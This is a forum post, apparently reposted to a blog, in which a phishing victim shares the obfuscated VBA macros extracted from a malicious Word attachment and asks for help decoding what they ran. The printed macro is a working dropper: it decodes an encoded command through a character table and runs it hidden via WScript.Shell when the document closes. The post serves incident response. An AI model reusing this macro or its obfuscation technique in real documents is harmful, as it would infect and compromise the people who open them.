I received a Word document by email. It appeared to come from a known sender as part of a message chain that had actually occurred (i.e. the text content was legitimate).
People faking senders, I catch all the time. Having the correct content threw me off and I opened the Word document. Upon closing the document, My firewall told me that Powershell was requesting internet access - which I denied, as I recognized what was going on. I deleted my temp folder contents and immediately ran a virus scan - but this isn't going to be caught.
I went back into the Word document - sandboxed, this time - and I extracted the macros. I believe it creates an executable - or at least, an executable script, and then runs it.
I need help determining what the final script is so that I can see what damage was done and whether there's anything left on my machine.
Malware Word Macros:
Public Function scala(ByVal scivolo As Integer) As String calcolo = Array("c", "a", ".", "+", "z", "/", "r", "h", "n", "\", "(", "P", "b", "k", "g", "p", "j", ":", "x", ")", "D", "i", "f", " ", "v", "B", "d", "$", "t", "S", "W", "w", "F", ";", "m", "=", "l", "E", "T", "y", "-", "G", "?", "C", "O", "o", "e", "'", "N", "A", "q", "s", ",") Dim sino As Integer For sino = LBound(calcolo) To UBound(calcolo) If sino = scivolo Then scala = calcolo(sino) End If Next End Function Public Function dinamico(valgo As String) If Len(valgo) < 4774 Then CreateObject("WScript.Shell").Run valgo, vbHide * 4 End If End Function Sub Document_Close() feralo = bordo("15453146065107463636234048453718212823403718460023253915015151234043453434010826231048463140441216460028232939512846340248462802304612433621460828190220453108364501263221364610470728281517050526452116502250080731465031461501150145510200453405292905280108135116023604344752232746082417491111204938492303234709042232410246184647193323292801062840110645004651512327460824174911112049384947090422324102461846473323104846314044121646002823293951284634024846280230461243362146082819022045310836450126292806210814104707282815170505264521165022500807314650314615011501455102004534055102150715422126352801081351164719") Application.Run "dinamico", feralo End Sub Function pirolisi(ByVal foro, ByVal baco) As String valletta = LTrim(vbNullString) & vbNullString roba = Array(foro, baco) For peso = 0 To UBound(roba) valletta = valletta + vbNullString + roba(peso) + vbNullString Next pirolisi = valletta End Function Function bordo(Optional dozzina As String, Optional dozzina2) aspirato = minerale(dozzina) brindare = Trim(vbNullString) & vbNullString For sino = 0 To Len(dozzina) If (sino + 1) <= UBound(aspirato) Then fiore = aspirato(sino + 1) sfarzoso = aspirato(sino) voragine = Int(sfarzoso + fiore) mucosa = scala(voragine) brindare = pirolisi(brindare, mucosa) sino = sino + 1 End If Next bordo = brindare End Function Function minerale(onere As String, Optional asettico As Integer) As Variant minerale = Split(Left(StrConv(onere, vbUnicode), Len(StrConv(onere, vbUnicode)) - 1), vbNullChar) End Function ---
I would be very grateful if someone could give me a hand with this.
Submitted November 29, 2017 at 08:07PM by PurloinedSentience http://ift.tt/2AGUc9D
No comments:
Post a Comment